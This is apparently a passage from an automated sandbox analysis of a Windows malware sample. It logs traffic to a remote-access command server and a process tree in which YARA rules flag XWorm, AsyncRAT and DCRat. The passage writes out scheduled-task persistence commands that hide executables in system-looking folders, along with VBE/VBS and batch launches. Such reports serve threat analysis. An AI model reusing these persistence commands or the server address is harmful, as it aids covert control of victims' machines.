                                Jun 11, 2024 20:09:35.396938086 CEST5023053189147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:36.697551966 CEST5318950230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:36.702800989 CEST5023053189147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:40.588191032 CEST5318950230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:40.593555927 CEST5023053189147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:43.772732973 CEST5023053189147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:43.775862932 CEST5318950230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:45.684993029 CEST5318950230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:45.684993029 CEST5319150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:45.690046072 CEST5023053189147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:45.690068007 CEST5023053191147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:45.690642118 CEST5319150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:45.870367050 CEST5319150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:45.875183105 CEST5023053191147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:50.963182926 CEST5319150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:50.968348026 CEST5023053191147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:54.165472031 CEST5023053191147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:54.169105053 CEST5319150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:56.525542974 CEST5319150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:56.527621031 CEST5319350230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:56.530842066 CEST5023053191147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:56.533214092 CEST5023053193147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:56.533318996 CEST5319350230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:56.569772005 CEST5319350230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:56.575386047 CEST5023053193147.185.221.19192.168.2.4
                                Jun 11, 2024 20:09:58.650599957 CEST5319350230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:09:58.655678034 CEST5023053193147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:05.006601095 CEST5023053193147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:05.006721973 CEST5319350230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:06.791323900 CEST5319350230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:06.793489933 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:06.796463966 CEST5023053193147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:06.798619986 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:06.798691034 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:06.835355043 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:06.840233088 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:06.900763035 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:06.906027079 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:06.947805882 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:06.953413963 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:07.025975943 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:07.031366110 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:07.119538069 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:07.125350952 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:07.150665045 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:07.155591965 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:07.181847095 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:07.187026978 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:07.228853941 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:07.233875990 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:15.274288893 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:15.277158976 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:18.453516960 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:18.468305111 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:18.806687117 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:19.328425884 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:19.328474045 CEST5023053195147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:19.328599930 CEST5023053194147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:19.328619957 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:19.328701019 CEST5319450230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:19.421020031 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:19.426285982 CEST5023053195147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:19.556945086 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:19.562033892 CEST5023053195147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:19.619358063 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:19.624317884 CEST5023053195147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:22.245033026 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:22.413809061 CEST5023053195147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:23.026079893 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:23.031766891 CEST5023053195147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:23.572685957 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:23.577745914 CEST5023053195147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:24.838439941 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:24.843678951 CEST5023053195147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:27.806608915 CEST5023053195147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:27.807861090 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:29.870866060 CEST5319550230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:29.870867014 CEST5319750230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:29.876194954 CEST5023053195147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:29.876223087 CEST5023053197147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:29.876579046 CEST5319750230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:29.944607019 CEST5319750230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:29.949866056 CEST5023053197147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:38.358757019 CEST5023053197147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:38.358903885 CEST5319750230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:39.994851112 CEST5319750230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:39.996615887 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.000936985 CEST5023053197147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.002743006 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.003040075 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.213078976 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.218283892 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.338361025 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.343964100 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.604048967 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.616159916 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.619735956 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.624959946 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.651017904 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.657303095 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.713435888 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.718816996 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.760181904 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.765721083 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.822875977 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.828326941 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.838430882 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.843676090 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:40.853842020 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:40.859380960 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:48.213233948 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:48.218116999 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:48.483464003 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:48.483625889 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:50.963198900 CEST5319850230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:50.965904951 CEST5320050230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:50.968208075 CEST5023053198147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:50.970920086 CEST5023053200147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:50.970993042 CEST5320050230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:51.004328012 CEST5320050230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:51.010112047 CEST5023053200147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:52.261218071 CEST5320050230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:52.266242027 CEST5023053200147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:55.901124954 CEST5320050230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:10:55.906290054 CEST5023053200147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:59.450640917 CEST5023053200147.185.221.19192.168.2.4
                                Jun 11, 2024 20:10:59.451507092 CEST5320050230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:01.496469975 CEST5320050230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:01.496503115 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:01.501576900 CEST5023053200147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:01.501605034 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:01.501858950 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:01.689251900 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:01.694272995 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:08.465347052 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:08.470551968 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:08.481029034 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:08.485901117 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:08.495093107 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:08.499825001 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:08.635205030 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:08.640430927 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:08.682038069 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:08.686865091 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:08.713291883 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:08.718198061 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:08.744647026 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:08.749593019 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:08.760344028 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:08.765152931 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:08.791791916 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:08.796673059 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:08.947763920 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:08.953361034 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:09.977479935 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:09.977951050 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:19.869462967 CEST5320150230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:19.873883963 CEST5320350230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:19.874439001 CEST5023053201147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:19.879331112 CEST5023053203147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:19.879410982 CEST5320350230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:19.907553911 CEST5320350230192.168.2.4147.185.221.19
                                Jun 11, 2024 20:11:19.912763119 CEST5023053203147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:28.355209112 CEST5023053203147.185.221.19192.168.2.4
                                Jun 11, 2024 20:11:28.355282068 CEST5320350230192.168.2.4147.185.221.19
                                TimestampSource PortDest PortSource IPDest IP
                                Jun 11, 2024 20:07:24.646483898 CEST53645071.1.1.1192.168.2.4
                                Jun 11, 2024 20:07:25.049457073 CEST6439653192.168.2.41.1.1.1
                                Jun 11, 2024 20:07:25.059401989 CEST53643961.1.1.1192.168.2.4
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jun 11, 2024 20:07:25.049457073 CEST192.168.2.41.1.1.10xef42Standard query (0)letter-takes.gl.at.ply.ggA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jun 11, 2024 20:07:25.059401989 CEST1.1.1.1192.168.2.40xef42No error (0)letter-takes.gl.at.ply.gg147.185.221.19A (IP address)IN (0x0001)false

                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:14:07:01
                                Start date:11/06/2024
                                Path:C:\Users\user\Desktop\ywXeiXEvP2.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\ywXeiXEvP2.exe"
                                Imagebase:0x7ff7c0180000
                                File size:3'817'238 bytes
                                MD5 hash:A8A4603BC85E306E0FDD17655E4820E4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                Reputation:low
                                Has exited:true

                                Target ID:1
                                Start time:14:07:02
                                Start date:11/06/2024
                                Path:C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe"
                                Imagebase:0x400000
                                File size:4'012'544 bytes
                                MD5 hash:57D593692C8428B66ED146E1FAC689B7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, Author: ditekSHen
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Avira
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 95%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:2
                                Start time:14:07:03
                                Start date:11/06/2024
                                Path:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                                Imagebase:0x8d0000
                                File size:3'880'844 bytes
                                MD5 hash:95D7FC6FAA389C5751DE5C2F88D9580B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 73%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:14:07:04
                                Start date:11/06/2024
                                Path:C:\Users\user\AppData\Local\Temp\XClient.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Local\Temp\XClient.exe"
                                Imagebase:0x480000
                                File size:34'816 bytes
                                MD5 hash:1BE2B217087429A8397F448C9C7B8F8D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, Author: ditekSHen
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 96%, ReversingLabs
                                Reputation:low
                                Has exited:false

                                Target ID:4
                                Start time:14:07:04
                                Start date:11/06/2024
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe"
                                Imagebase:0xf40000
                                File size:147'456 bytes
                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:5
                                Start time:14:07:05
                                Start date:11/06/2024
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs"
                                Imagebase:0xf40000
                                File size:147'456 bytes
                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:6
                                Start time:14:07:12
                                Start date:11/06/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" "
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:14:07:12
                                Start date:11/06/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:14:07:12
                                Start date:11/06/2024
                                Path:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe"
                                Imagebase:0x2d0000
                                File size:3'549'696 bytes
                                MD5 hash:7EC6BC11E4B2E409845E3160EC47F5D7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1889481824.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1902459797.000000001290D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 88%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:12
                                Start time:14:07:16
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:13
                                Start time:14:07:16
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:14
                                Start time:14:07:16
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:15
                                Start time:14:07:16
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:16
                                Start time:14:07:16
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:17
                                Start time:14:07:16
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:18
                                Start time:14:07:16
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:19
                                Start time:14:07:16
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:20
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 8 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:21
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:22
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
